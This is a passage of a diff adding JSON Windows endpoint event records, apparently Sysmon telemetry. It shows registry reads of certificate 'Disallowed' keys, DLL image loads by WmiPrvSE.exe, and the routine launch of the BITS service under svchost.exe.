"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573455890000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 4292, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0\\Linkage", + "registry_value": "Linkage", + "timestamp": 131883573455890000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "wtsapi32.dll", + "image_path": "C:\\Windows\\System32\\wtsapi32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "CORPerfMonExt.dll", + "image_path": 
"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\CORPerfMonExt.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + 
"timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\System32\\msvcr120_clr0400.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456050000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573456200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bitsperf.dll", + "image_path": "C:\\Windows\\System32\\bitsperf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573456509984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 6868, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883573456770000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, 
+ { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456670000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { 